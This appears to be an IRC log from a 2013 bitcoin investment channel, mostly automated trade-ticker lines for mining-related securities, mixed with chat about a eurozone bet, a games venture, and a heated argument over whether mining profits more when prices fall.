[BTCTC] [ASICMINER-PT] 1 @ 2.4849 BTC [+] Jun 05 04:04:27 [HAVELOCK] [ASICM] 10 @ 0.02489988 = 0.249 BTC [+] Jun 05 04:12:56 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 05 04:13:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [+] Jun 05 04:16:15 mircea_popescu: The bet about a country exiting the eurozone Jun 05 04:20:55 [BTCTC] [BASIC-MINING] 1 @ 0.689 BTC [-] Jun 05 04:20:57 [BTCTC] [BASIC-MINING] 17 @ 0.69 = 11.73 BTC [+] Jun 05 04:20:58 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 05 04:20:58 [BTCTC] [BASIC-MINING] 11 @ 0.69 = 7.59 BTC [+] Jun 05 04:21:50 [HAVELOCK] [ASICM] 13 @ 0.0248 = 0.3224 BTC [-] Jun 05 04:21:51 [HAVELOCK] [ASICM] 27 @ 0.02489 = 0.672 BTC [+] Jun 05 04:22:03 zebedee_ reference doesn't work. if you quote the text i can prolly tell you. Jun 05 04:22:57 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Jun 05 04:24:00 I see - you're saying it's unclear what would be an authoritative announcement to do so? Jun 05 04:25:55 i still have no idea what your bet said. Jun 05 04:28:39 Sthg like "One or more of the 17 Eurozone countries will announce, by the end of 2013, intent to leave the euro" Jun 05 04:30:08 how does a country announce intent. Jun 05 04:31:19 [BTCTC] [S.MPOE-PT] 10 @ 0.000707 = 0.0071 BTC [-] Jun 05 04:32:58 [BTCTC] [S.MPOE-PT] 10 @ 0.000708 = 0.0071 BTC [+] Jun 05 04:36:17 e.g. leader stating or introduction of law to introduce say Drachma at start of April 2014. I'd have thought it's fairly clear, but perhaps not. Jun 05 04:37:46 you know how it is, people always chasing for "ambiguity" Jun 05 04:38:25 Fair enough. Jun 05 04:50:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [+] Jun 05 04:51:58 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jun 05 04:52:35 [HAVELOCK] [ASICM] 10 @ 0.02465 = 0.2465 BTC [-] Jun 05 04:53:14 [BTCTC] [BITVPS] 1 @ 0.00069 BTC [+] Jun 05 04:53:59 [BTCTC] [BITVPS] 15 @ 0.000698 = 0.0105 BTC [+] Jun 05 04:55:36 [HAVELOCK] [ASICM] 4 @ 0.02489 = 0.0996 BTC [+] Jun 05 04:57:50 [BTCTC] [CRYPTO-TRADE] 2 @ 0.188997 = 0.378 BTC [+] Jun 05 04:58:19 mircea_popescu , i have a really good idea for a game(I will pm you about it tomorrow). I also know (from a long time ago) a few devs at Insomniac Games that I used to do alpha testing for Jun 05 04:59:49 this ministry of games, is that directed at gamining like gambling or gaming like MMORPG or gaming like minigames for facebook? Jun 05 05:00:27 [BTCTC] [B.YABMC] 1 @ 0.01709 BTC [+] Jun 05 05:01:03 yes Jun 05 05:02:44 [HAVELOCK] [VTX] 1 @ 0.425 BTC [-] Jun 05 05:03:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.0248 = 0.248 BTC [+] Jun 05 05:03:32 ;;estimate Jun 05 05:03:35 Next difficulty estimate | 15597441.5616 based on data since last change | 18442322.448 based on data for last three days Jun 05 05:03:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.024869 = 0.2487 BTC [+] Jun 05 05:05:13 [BTCTC] [BTC-TRADING-PT] 5 @ 0.24 = 1.2 BTC [-] Jun 05 05:07:48 [BTCTC] [ASICMINER-PT] 17 @ 2.44 = 41.48 BTC [-] Jun 05 05:08:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.024681 BTC [-] Jun 05 05:08:35 [BTCTC] [TAT.ASICMINER] 58 @ 0.02468 = 1.4314 BTC [-] Jun 05 05:08:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.02467 = 0.1974 BTC [-] Jun 05 05:08:47 [BTCTC] [TAT.ASICMINER] 100 @ 0.02466 = 2.466 BTC [-] Jun 05 05:08:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.02465 = 0.1972 BTC [-] Jun 05 05:09:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.02465 = 0.2712 BTC [-] Jun 05 05:09:04 [BTCTC] [TAT.ASICMINER] 53 @ 0.02463 = 1.3054 BTC [-] Jun 05 05:09:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02462 BTC [-] Jun 05 05:09:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.02461 = 0.1231 BTC [-] Jun 05 05:09:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02461 = 0.0984 BTC [-] Jun 05 05:09:34 [BTCTC] [TAT.ASICMINER] 60 @ 0.02461 = 1.4766 BTC [-] Jun 05 05:09:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] Jun 05 05:09:44 [BTCTC] [TAT.ASICMINER] 102 @ 0.0246 = 2.5092 BTC [-] Jun 05 05:09:54 [BTCTC] [TAT.ASICMINER] 73 @ 0.024503 = 1.7887 BTC [-] Jun 05 05:11:29 [HAVELOCK] [ASICM] 4 @ 0.02489 = 0.0996 BTC [+] Jun 05 05:18:06 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] Jun 05 05:18:25 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 05 05:19:11 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 05 05:25:28 PeterL_ the later. Jun 05 05:25:35 jborkl cool! Jun 05 05:25:58 (ie, gaming like mmorpg and facebook) Jun 05 05:26:07 so, apps meant to make money by charging a dollar or something for each download? Jun 05 05:26:20 for ipod etc? Jun 05 05:33:10 Is it just my imagination, or is the CampBX website really slow? Jun 05 05:44:18 PeterL_ no different from any example of the multi-billion dollar computer game industry. Jun 05 05:45:33 Will you allow people to do the downloads for bitcoins? Jun 05 05:47:33 if that;'s the model Jun 05 05:48:11 [HAVELOCK] [SDICE] 2 @ 0.23 = 0.46 BTC [-] Jun 05 05:51:53 [HAVELOCK] [ASICM] 65 @ 0.02489 = 1.6179 BTC [+] Jun 05 05:51:54 [HAVELOCK] [ASICM] 30 @ 0.02489988 = 0.747 BTC [+] Jun 05 05:51:56 [HAVELOCK] [ASICM] 29 @ 0.02489989 = 0.7221 BTC [+] Jun 05 05:51:57 [HAVELOCK] [ASICM] 42 @ 0.0248999 = 1.0458 BTC [+] Jun 05 05:51:57 [HAVELOCK] [ASICM] 200 @ 0.0249 = 4.98 BTC [+] Jun 05 05:51:58 [HAVELOCK] [ASICM] 200 @ 0.02499 = 4.998 BTC [+] Jun 05 05:51:59 [HAVELOCK] [ASICM] 200 @ 0.02499999 = 5 BTC [+] Jun 05 05:52:00 [HAVELOCK] [ASICM] 198 @ 0.025 = 4.95 BTC [+] Jun 05 05:52:01 [HAVELOCK] [ASICM] 8 @ 0.025 = 0.2 BTC [+] Jun 05 05:53:22 [HAVELOCK] [ASICM] 668 @ 0.025 = 16.7 BTC [+] Jun 05 05:53:39 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [+] Jun 05 05:57:51 [HAVELOCK] [ASICM] 3 @ 0.0247 = 0.0741 BTC [-] Jun 05 06:00:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.024747 BTC [+] Jun 05 06:00:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.024747 = 0.1485 BTC [+] Jun 05 06:00:22 [MPEX] [S.MPOE] 13500 @ 0.00075064 = 10.1336 BTC [-] Jun 05 06:01:25 [BTCTC] [TAT.ASICMINER] 14 @ 0.02475 = 0.3465 BTC [+] Jun 05 06:05:08 ;;calc .00075 * 1000000000 Jun 05 06:05:08 750000 Jun 05 06:05:12 ;;calc .00075 * 10000000000 Jun 05 06:05:13 7500000 Jun 05 06:15:52 something about your monitor? Jun 05 06:16:16 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [-] Jun 05 06:20:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.02475 = 0.0495 BTC [+] Jun 05 06:20:39 beef regulation Jun 05 06:20:45 ahh Jun 05 06:20:51 i asume Jun 05 06:20:54 assume* Jun 05 06:21:00 that longest german word thing Jun 05 06:22:06 http://coin.furuknap.net/understanding-mining-bonds/ Jun 05 06:22:19 Submitted for your review and pleasure :-) Jun 05 06:22:39 I'll be out for dinner, feel free to yell at me while I'm gone, I won't be recording anything... Jun 05 06:24:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 06:29:19 one error i see so far is that you state repeatedly that a mining bond's depreciation is absolute, and that full repayment is impossible Jun 05 06:29:28 while those things are extremely likely Jun 05 06:29:39 they are not 100% factual Jun 05 06:30:20 anything can happen, including difficulty decreasing Jun 05 06:31:41 you may want consider calling them structured bonds Jun 05 06:32:17 or, callable structured bonds Jun 05 06:36:09 left the above as a comment for you ;) Jun 05 06:38:04 [HAVELOCK] [ASICM] 9 @ 0.024701 = 0.2223 BTC [+] Jun 05 06:38:06 [HAVELOCK] [ASICM] 15 @ 0.0247 = 0.3705 BTC [-] Jun 05 06:38:07 [HAVELOCK] [ASICM] 25 @ 0.0247 = 0.6175 BTC [-] Jun 05 06:39:26 thanks furuknap Jun 05 06:39:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.02475 = 0.0495 BTC [+] Jun 05 06:43:29 [HAVELOCK] [HIM] 1 @ 2.99 BTC [+] Jun 05 06:45:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.02475 = 0.198 BTC [+] Jun 05 06:51:01 whoa HIM is about to hit 3 Jun 05 06:51:08 man I totally bailed on that train too early :( Jun 05 06:51:16 ThickAsThieves: you still around? Jun 05 06:51:54 yes Jun 05 06:51:55 wassup Jun 05 06:52:41 Since you hold a lot of ASICM I wanted to know your thoughts on the mining industry... Jun 05 06:54:00 sure Jun 05 06:54:06 can you be more specific? Jun 05 06:54:10 lol Jun 05 06:54:14 he asks you but not me Jun 05 06:54:50 D3, you are welcome to chime in, if you can be a big boy about it Jun 05 06:54:57 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [-] Jun 05 06:55:34 heh Jun 05 06:56:35 [BTCTC] [PAJKA.BOND] 5 @ 0.10897 = 0.5449 BTC [+] Jun 05 06:57:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 06:57:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.02475 = 0.0743 BTC [+] Jun 05 07:12:27 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [-] Jun 05 07:12:29 [BTCTC] [ASICMINER-PT] 4 @ 2.47 = 9.88 BTC [-] Jun 05 07:13:46 [BTCTC] [BASIC-MINING] 1 @ 0.694999 BTC [+] Jun 05 07:13:49 [BTCTC] [BASIC-MINING] 1 @ 0.695 BTC [+] Jun 05 07:13:51 [BTCTC] [BASIC-MINING] 5 @ 0.699 = 3.495 BTC [+] Jun 05 07:19:20 [MPEX] [S.MPOE] 16000 @ 0.00075013 = 12.0021 BTC [-] Jun 05 07:19:22 [MPEX] [S.MPOE] 5550 @ 0.00075297 = 4.179 BTC [+] Jun 05 07:22:01 [BTCTC] [TAT.ASICMINER] 40 @ 0.02475 = 0.99 BTC [+] Jun 05 07:23:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02475 = 0.0495 BTC [+] Jun 05 07:24:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.02475 = 0.1238 BTC [+] Jun 05 07:30:05 [HAVELOCK] [ASICM] 1 @ 0.02465 BTC [-] Jun 05 07:30:06 [HAVELOCK] [ASICM] 50 @ 0.024625 = 1.2313 BTC [-] Jun 05 07:30:07 [HAVELOCK] [ASICM] 34 @ 0.0246 = 0.8364 BTC [-] Jun 05 07:30:08 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] Jun 05 07:30:10 [HAVELOCK] [ASICM] 14 @ 0.024533 = 0.3435 BTC [-] Jun 05 07:32:23 [BTCTC] [S.DICE-PT] 1 @ 0.002451 BTC [-] Jun 05 07:33:16 [BTCTC] [S.DICE-PT] 6 @ 0.00245 = 0.0147 BTC [-] Jun 05 07:41:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 07:45:05 [BTCTC] [TAT.ASICMINER] 28 @ 0.02475 = 0.693 BTC [+] Jun 05 07:45:19 ;;bc,stats Jun 05 07:45:21 Current Blocks: 239826 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 77 blocks | Next Difficulty In About: 8 hours, 33 minutes, and 19 seconds | Next Difficulty Estimate: 15584839.623 | Estimated Percent Change: 28.23428 Jun 05 07:45:26 [BTCTC] [ASICMINER-PT] 1 @ 2.4751 BTC [+] Jun 05 07:45:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4751 BTC [+] Jun 05 07:45:35 It doesn't even slow down... Jun 05 07:46:48 [HAVELOCK] [ASICM] 3 @ 0.0249 = 0.0747 BTC [+] Jun 05 07:48:03 Hello Jun 05 07:48:19 Sample work? Jun 05 07:49:02 Ah, yeah, check the top nav on my blog: http://coin.furuknap.net/ Jun 05 07:49:11 Not the entire book, no. Jun 05 07:49:41 Like you'd do what? Jun 05 07:50:01 :-) They don't hurt, you know. Jun 05 07:50:11 Knowledge is an easy burden to bear. Jun 05 07:50:33 Well, pick up the preview and let me know what you think. Jun 05 07:51:43 That's up to you :-) Jun 05 07:54:21 It is also a very good way to 1) disclaim myself from any responsibility for your actions, 2) remove those that would not seek knowledge from those that claim to have none, and 3) scare away those that would be scared from such claims. Jun 05 08:02:26 [BTCTC] [CRYPTO-TRADE] 1 @ 0.183 BTC [-] Jun 05 08:12:27 [HAVELOCK] [ASICM] 8 @ 0.02465 = 0.1972 BTC [-] Jun 05 08:12:28 [HAVELOCK] [ASICM] 89 @ 0.02455 = 2.185 BTC [-] Jun 05 08:15:36 [BTCTC] [BITVPS] 8 @ 0.000699 = 0.0056 BTC [+] Jun 05 08:17:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.024741 BTC [-] Jun 05 08:19:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.024741 BTC [-] Jun 05 08:21:23 [BTCTC] [ASICMINER-PT] 1 @ 2.4631 BTC [-] Jun 05 08:21:25 [BTCTC] [ASICMINER-PT] 1 @ 2.463 BTC [-] Jun 05 08:28:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.024737 BTC [-] Jun 05 08:29:23 [HAVELOCK] [ASICM] 11 @ 0.02455 = 0.2701 BTC [-] Jun 05 08:29:24 [HAVELOCK] [ASICM] 189 @ 0.02453202 = 4.6366 BTC [-] Jun 05 08:32:38 Probably plenty of spelling and grammar error, but I have people that take care of that :-) Jun 05 08:32:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.024738 = 0.1237 BTC [+] Jun 05 08:33:21 And thanks :-) Jun 05 08:33:51 [BTCTC] [TAT.ASICMINER] 9 @ 0.024738 = 0.2226 BTC [+] Jun 05 08:34:34 [BTCTC] [TAT.ASICMINER] 60 @ 0.024739 = 1.4843 BTC [+] Jun 05 08:36:43 [BTCTC] [ASICMINER-PT] 1 @ 2.4755 BTC [+] Jun 05 08:36:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4755 BTC [+] Jun 05 08:37:29 [BTCTC] [S.DICE-PT] 11 @ 0.00245 = 0.027 BTC [-] Jun 05 08:38:07 [BTCTC] [TAT.ASICMINER] 71 @ 0.02475 = 1.7573 BTC [+] Jun 05 08:38:41 [BTCTC] [BITVPS] 1 @ 0.0007 BTC [+] Jun 05 08:38:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 08:43:16 [BTCTC] [ASICMINER-PT] 2 @ 2.4765 = 4.953 BTC [+] Jun 05 08:46:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.183 BTC [-] Jun 05 09:00:12 [BTCTC] [TAT.ASICMINER] 21 @ 0.02475 = 0.5198 BTC [+] Jun 05 09:04:24 [BTCTC] [TAT.ASICMINER] 22 @ 0.02475 = 0.5445 BTC [+] Jun 05 09:06:58 [BTCTC] [ASICMINER-PT] 1 @ 2.4765 BTC [+] Jun 05 09:13:17 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [+] Jun 05 09:13:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.024601 BTC [-] Jun 05 09:13:42 ;;tslb Jun 05 09:13:45 Time since last block: 9 minutes and 26 seconds Jun 05 09:14:12 It's mostly math, so not much to argue about :-) Jun 05 09:14:29 ;;bc,stats Jun 05 09:14:31 Current Blocks: 239838 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 65 blocks | Next Difficulty In About: 7 hours, 7 minutes, and 23 seconds | Next Difficulty Estimate: 15590806.423 | Estimated Percent Change: 28.28337 Jun 05 09:14:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] Jun 05 09:15:11 This math isn't fuzzy :-) Jun 05 09:15:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.024551 BTC [-] Jun 05 09:15:21 What I wake up tomorrow, LTC will finally be more profitable to mine than BTC. Again. Jun 05 09:15:37 *When Jun 05 09:17:40 I couldn't because those factors aren't relevant and doesn't change the math. Jun 05 09:18:12 You could say the same thing about 2+2=4. Can that be wrong if you don't factor in parameters? Jun 05 09:18:22 The argument is simplified somewhat here: http://coin.furuknap.net/why-investing-in-mining-is-always-a-bet-that-prices-will-drop/ Jun 05 09:20:01 It's stll not fuzzy, it's just that people put their feelings of having made the wrong choice into the mix. If I always felt that 2+2=5 and people point out that I'm wrong, it doesn't help if I'm hurt by their words. Jun 05 09:21:04 My point. Jun 05 09:21:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.024511 BTC [-] Jun 05 09:22:09 The statement is simple: Mining is vastly more profitable when prices drop. That's been proven, yet people are hurt that they thought they wold get much richer if prices rose. Jun 05 09:22:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.024511 BTC [-] Jun 05 09:22:51 I do'nt care what you're fond of. That's your feeling and that's about as relevant as the weather. Jun 05 09:23:54 Your certainty is also irrelevant. Prove the math wrong. Tell your girlfriend about your feelings. Jun 05 09:24:48 Then cry to your mother. I don't care, the math doesn't care, the statement is still the same, and your feelings or understanding of it is irrelevant. Jun 05 09:25:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.024511 BTC [-] Jun 05 09:25:22 What strikes me most about that particular article is that for a community that places so much faith in numbers, people get pissed off when the numbers tell them something they don't like. Jun 05 09:27:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.024511 BTC [-] Jun 05 09:28:20 [BTCTC] [ASICMINER-PT] 1 @ 2.4799 BTC [+] Jun 05 09:28:33 OK. How much is 100/25? Jun 05 09:29:08 [HAVELOCK] [ASICM] 5 @ 0.025 = 0.125 BTC [+] Jun 05 09:29:10 C'mon, you don't need a calculator for that... Jun 05 09:30:10 Point? It's a simple question. Do you not know the answer? Jun 05 09:30:40 OK, so use a calculator then. What is 100/25? Jun 05 09:31:06 OK. Good. Keep the calculator up. Jun 05 09:31:11 What is 100/10? Jun 05 09:31:44 You can't do basic math but you're hanging out in an investor channel? Geez. Jun 05 09:32:26 Even better, you're arguing against math, with feelings, no less, but you can't even answer what 100/10 is? Jun 05 09:33:24 OK. If we say that A=100 and B=10, what is A/B? Jun 05 09:34:11 And at least you still don't understand the math. Jun 05 09:34:41 Look, no matter how I present to you the numbers, they won't change. If you don't understand that, you'll goon thinking that investing in mining is a great idea if the prices boom. Jun 05 09:35:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024749 BTC [+] Jun 05 09:37:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 09:37:33 It doesn't matter. How many times do I have to tell you? Jun 05 09:38:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 09:38:39 The underlying problem here is that people haven't done the math. They trust in numbers but don't understand them. So, when people tell them, in words they do understand, they get hurt because they feel stupid. That's fine. Their feelings are their problems, not mine. Jun 05 09:43:22 There's no tunnel vision here. It's 2+2, with slightly different numbers. Basic arithmetic. But the implications make you feel something you don't like, so you object to it. That's fine, but it still doesn't change anything. Jun 05 09:44:28 I've been begging people for weeks to prove me wrong and all people are doing is arguing semantics of whether I can prove that they bet anything or that A+B=C is completely different if the letter are G+D=L. Jun 05 09:45:24 Red herrings are abundant from people who try to argue something they don't understand or when they get angry because they feel the numbers attack their pride. Jun 05 09:45:38 Why is that? Jun 05 09:45:46 [BTCTC] [S.DICE-PT] 9 @ 0.00245 = 0.0221 BTC [-] Jun 05 09:46:26 Yeah, you seem to be making fuzzy statements all the time about feelings and imagination and love and peace and crap. Prove the fucking math wrong! Jun 05 09:47:40 Then do so and show me where I'm wrong. Jun 05 09:48:19 No, it isn't. Jun 05 09:48:44 Not if you understand what you're trying to figure out and you want the truth, not whatever you feel is right. Jun 05 09:51:09 No, but every other statement you make reveals your emotions about the topic. That's my point. Run the frigging numbers. The problems is extremely simple: In a situation where you mine, what yields the most profit of a price decrease or a price increase? Jun 05 09:51:42 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] Jun 05 09:52:16 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 05 09:52:26 My math speaks directly to this, and answers the question simply. If you have other numbers that show something different, then I beg you to present them. Changing the problem isn't going to help; that's like saying 2+2=5, but only if I really meant to subtract one at the end. Jun 05 09:52:29 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [-] Jun 05 09:52:31 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 05 09:53:02 Yeah, let's make math a democratic process. Jun 05 09:53:29 I vote that the cube root of 81 is 3! Jun 05 09:53:49 Anyone opposed? Otherwise, from this day forth, the cube root of 81 is 3. All hail! Jun 05 09:54:34 And again you demonstrate that you don't understand this... Jun 05 09:55:12 Yeah, I saw that 50 people got 2+2 to be 5. I reviewed their data, they had two plus two on one side and five on the other. Must be right, then. Jun 05 09:56:03 You clearly don't understand what you're arguinng against, so I'm going to sleep instead. Good night. Jun 05 09:56:16 Yes, I do. Jun 05 10:05:53 [MPEX] [S.MPOE] 1512 @ 0.00075136 = 1.1361 BTC [-] Jun 05 10:06:23 [BTCTC] [BTC-TRADING-PT] 1 @ 0.28 BTC [+] Jun 05 10:06:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.024749 BTC [-] Jun 05 10:08:56 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] Jun 05 10:15:40 [MPEX] [S.MPOE] 21950 @ 0.00074778 = 16.4138 BTC [-] Jun 05 10:15:41 [MPEX] [S.MPOE] 13050 @ 0.00074731 = 9.7524 BTC [-] Jun 05 10:15:57 [MPEX] [S.MPOE] 1000 @ 0.00073995 = 0.74 BTC [-] Jun 05 10:21:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024701 BTC [-] Jun 05 10:21:59 [HAVELOCK] [ASICM] 16 @ 0.025 = 0.4 BTC [+] Jun 05 10:22:01 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [+] Jun 05 10:25:37 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jun 05 10:49:29 [BTCTC] [S.DICE-PT] 10 @ 0.00255 = 0.0255 BTC [+] Jun 05 10:51:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.024749 BTC [+] Jun 05 10:55:40 [BTCTC] [ASICMINER-PT] 2 @ 2.478 = 4.956 BTC [+] Jun 05 10:57:23 [BTCTC] [TAT.ASICMINER] 72 @ 0.02475 = 1.782 BTC [+] Jun 05 11:02:41 [BTCTC] [CRYPTO-TRADE] 4 @ 0.177105 = 0.7084 BTC [-] Jun 05 11:02:46 [BTCTC] [CRYPTO-TRADE] 2 @ 0.177104 = 0.3542 BTC [-] Jun 05 11:09:36 [BTCTC] [BITVPS] 1 @ 0.00069 BTC [-] Jun 05 11:31:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024711 BTC [-] Jun 05 11:31:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.02471 = 0.0741 BTC [-] Jun 05 11:32:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Jun 05 11:49:30 [HAVELOCK] [ASICM] 21 @ 0.025 = 0.525 BTC [+] Jun 05 11:54:34 [HAVELOCK] [ASICM] 12 @ 0.025 = 0.3 BTC [+] Jun 05 11:54:53 [HAVELOCK] [ASICM] 50 @ 0.025015 = 1.2508 BTC [+] Jun 05 11:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] Jun 05 12:05:21 [HAVELOCK] [ASICM] 39 @ 0.025025 = 0.976 BTC [+] Jun 05 12:07:33 [BTCTC] [BITVPS] 110 @ 0.000699 = 0.0769 BTC [+] Jun 05 12:09:10 [BTCTC] [BTC-BOND] 1 @ 0.00994 BTC [-] Jun 05 12:09:30 [BTCTC] [BTC-BOND] 7 @ 0.0099 = 0.0693 BTC [-] Jun 05 12:10:30 [BTCTC] [BITVPS] 66 @ 0.000699 = 0.0461 BTC [+] Jun 05 12:13:18 [BTCTC] [S.MPOE-PT] 20 @ 0.000708 = 0.0142 BTC [+] Jun 05 12:19:45 [BTCTC] [ASICMINER-PT] 1 @ 2.466 BTC [-] Jun 05 12:19:54 [HAVELOCK] [ASICM] 89 @ 0.02475 = 2.2028 BTC [-] Jun 05 12:19:55 [HAVELOCK] [ASICM] 11 @ 0.02467816 = 0.2715 BTC [-] Jun 05 12:30:25 [HAVELOCK] [ASICM] 43 @ 0.025025 = 1.0761 BTC [+] Jun 05 12:49:02 [HAVELOCK] [ASICM] 357 @ 0.02502499 = 8.9339 BTC [-] Jun 05 12:52:31 [BTCTC] [BITVPS] 1 @ 0.00069 BTC [-] Jun 05 12:57:13 [MPEX] [S.MPOE] 6688 @ 0.00075083 = 5.0216 BTC [+] Jun 05 12:57:19 [MPEX] [S.MPOE] 1612 @ 0.00075133 = 1.2111 BTC [+] Jun 05 12:58:47 Anyone got a mpex keyid? Jun 05 12:59:33 hiya TF Jun 05 12:59:48 hi truff1es Jun 05 13:00:35 yeah...it sure can be Jun 05 13:00:44 hi mjr_~ Jun 05 13:00:56 Well, if you have a mpex account, send me a PM. Free bitcoins for ya. Jun 05 13:04:39 [HAVELOCK] [ASICM] 210 @ 0.0249211 = 5.2334 BTC [-] Jun 05 13:04:56 well, what i think everyone should remember, at the end of the day, is that even though it may be beyond the scope of this discussion, and i'm just being honest here... Jun 05 13:05:15 hahaha Jun 05 13:05:21 i was just using placeholder words Jun 05 13:06:42 while it may be tempting to view things in that light, i can't stress enough the importance of keeping in mind the following Jun 05 13:07:09 after all, what is "it" really that we are even discussing Jun 05 13:07:22 lol, its easy and fun Jun 05 13:07:42 tack on a couple of "i believe" 's Jun 05 13:08:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.188985 BTC [+] Jun 05 13:08:49 [BTCTC] [BTC-BOND] 9 @ 0.009999 = 0.09 BTC [+] Jun 05 13:09:31 lol...you give people too much credit Jun 05 13:09:40 i don't think they have a firm idea of what they "mean" usually Jun 05 13:09:51 hence the fluff, the qualifiers, the hedging Jun 05 13:10:15 first rule of academia, don't say definites Jun 05 13:10:31 say "it can be shown", "an argument can be made for" Jun 05 13:10:47 since you can't disprove those statement Jun 05 13:10:57 nuance... Jun 05 13:13:06 hey, i am pretty good at bullshitting Jun 05 13:13:19 but i'm also good at actual things...gotta be something under the bullshit Jun 05 13:15:57 hmmm Jun 05 13:16:12 diff should be over 15 million next readjustment Jun 05 13:18:44 [BTCTC] [ASICMINER-PT] 1 @ 2.468 BTC [+] Jun 05 13:22:04 hmmm Jun 05 13:22:07 sounds dystopian Jun 05 13:22:18 anyone looking into ministry of games? Jun 05 13:22:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.024749 BTC [+] Jun 05 13:22:52 think its a new IPO coming up Jun 05 13:23:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.02475 = 0.0743 BTC [+] Jun 05 13:23:36 lol Jun 05 13:23:39 not sure Jun 05 13:25:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 13:25:10 [HAVELOCK] [ASICM] 42 @ 0.024679 = 1.0365 BTC [-] Jun 05 13:25:12 [HAVELOCK] [ASICM] 165 @ 0.02467816 = 4.0719 BTC [-] Jun 05 13:25:13 [HAVELOCK] [ASICM] 42 @ 0.0246 = 1.0332 BTC [-] Jun 05 13:25:14 [HAVELOCK] [ASICM] 679 @ 0.02453202 = 16.6572 BTC [-] Jun 05 13:25:15 [HAVELOCK] [ASICM] 72 @ 0.02453201 = 1.7663 BTC [-] Jun 05 13:25:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.02484 = 0.149 BTC [+] Jun 05 13:25:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.02484 = 0.149 BTC [+] Jun 05 13:26:12 [HAVELOCK] [ASICM] 1 @ 0.02453201 BTC [-] Jun 05 13:26:13 [HAVELOCK] [ASICM] 37 @ 0.024506 = 0.9067 BTC [-] Jun 05 13:26:14 [HAVELOCK] [ASICM] 11 @ 0.024505 = 0.2696 BTC [-] Jun 05 13:26:16 [HAVELOCK] [ASICM] 31 @ 0.02450001 = 0.7595 BTC [-] Jun 05 13:26:17 [HAVELOCK] [ASICM] 10 @ 0.0245 = 0.245 BTC [-] Jun 05 13:26:18 [HAVELOCK] [ASICM] 10 @ 0.0245 = 0.245 BTC [-] Jun 05 13:26:25 [BTCTC] [TAT.ASICMINER] 15 @ 0.02485 = 0.3728 